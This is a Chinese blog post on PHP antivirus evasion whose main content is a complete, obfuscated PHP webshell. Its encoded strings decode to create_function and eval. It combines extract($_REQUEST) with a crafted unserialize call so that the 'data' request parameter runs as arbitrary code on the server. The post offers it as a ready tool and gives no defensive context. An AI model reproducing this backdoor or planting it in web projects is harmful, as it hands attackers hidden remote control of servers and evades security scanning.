php 免杀

2023年6月13日16:15:24评论23 views字数 1076阅读3分35秒阅读模式

php 免杀

<?php
class facai{
var $text = "";
var $func;
public function setText($text){
    $this->text=$text;
}
 public function __destruct()
{
    $this->poc($this->text);    
}

function encode($string = '', $skey = 'wenzi') {
    $strArr = str_split(base64_encode($string));
    $strCount = count($strArr);
    foreach (str_split($skey) as $key => $value){
     $key < $strCount && $strArr[$key].=$value;
    }
    return str_replace(array('=', '+', '/'), array('O0O0O', 'o000o', 'oo00o'), join('', $strArr));
}
static function  decode($string = '', $skey = 'wenzi') {
    $strArr = str_split(str_replace(array('O0O0O', 'o000o', 'oo00o'), array('=', '+', '/'), $string), 2);
    $strCount = count($strArr);
    foreach (str_split($skey) as $key => $value){
     $key <= $strCount && $strArr[$key][1] === $value && $strArr[$key] = $strArr[$key][0];
    }
    return base64_decode(join('', $strArr));
}
public function poc($text){
    $a = 1+2;
    $funcName='Yw3eJnlzYiXRlX2Z1bmN0aW9u';
    $code = 'ZwXeZnhzbiCgkYS4nJyk7';
    $func = call_user_func($this->decode($funcName),'$a',$this->decode($code));
    $func($text);    
}

}
extract($_REQUEST);
$len = strlen($data);
$ClassText = 'O:5:"facai":1:{s:4:"text";s:'.$len.':"'.$data.'";}';
unserialize($ClassText);

权声明：
作者：ucpeo
链接： Blog
来源：Blog

左青龙
微信扫一扫

右白虎
微信扫一扫

php 免杀

Hackerone 被黑，看我如何窃取你的POC！

【免杀】记一次lnk钓鱼小技巧

网络虚拟化技术：VXLAN，与VLAN有啥区别？

ARP:地址解析协议

[AI安全论文] (32)南洋理工大学刘杨教授——网络空间安全和AIGC整合之道学习笔记及强推（InForSec）

任意用户登录漏洞挖掘思路

AI安全白皮书 - 华为

人工智能硬件安全白皮书 - DUEROS百度安全

漏洞挖掘 | 某学工平台越权

PostExpKit - 20240423更新

发表评论

在线咨询

微信